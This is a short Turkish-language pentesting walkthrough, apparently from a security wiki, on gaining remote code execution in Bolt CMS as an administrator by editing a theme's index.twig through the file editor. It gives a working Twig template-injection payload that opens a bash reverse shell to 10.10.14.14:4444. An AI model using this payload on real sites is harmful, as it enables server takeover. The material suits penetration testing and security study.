RCE

Yönetici olarak giriş yaptıktan sonra (giriş ekranına erişmek için /bot'a gidin), Bolt CMS'de RCE alabilirsiniz:

• Configuration -> View Configuration -> Main Configuration seçin veya URL yoluna /bolt/file-edit/config?file=/bolt/config.yaml gidin

• Tema değerini kontrol edin

• File management -> View & edit templates seçin

• Önceki adımda bulunan tema tabanını seçin (base-2021 bu durumda) ve index.twig'i seçin

• Benim durumumda bu URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig

• Bu dosyaya şablon enjeksiyonu (Twig) aracılığıyla payload'ınızı ayarlayın, örneğin: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

• Ve değişiklikleri kaydedin

• Maintenance -> Clear the cache'de önbelleği temizleyin

• Sayfaya tekrar düzenli bir kullanıcı olarak erişin ve payload'ın çalıştırıldığını görmelisiniz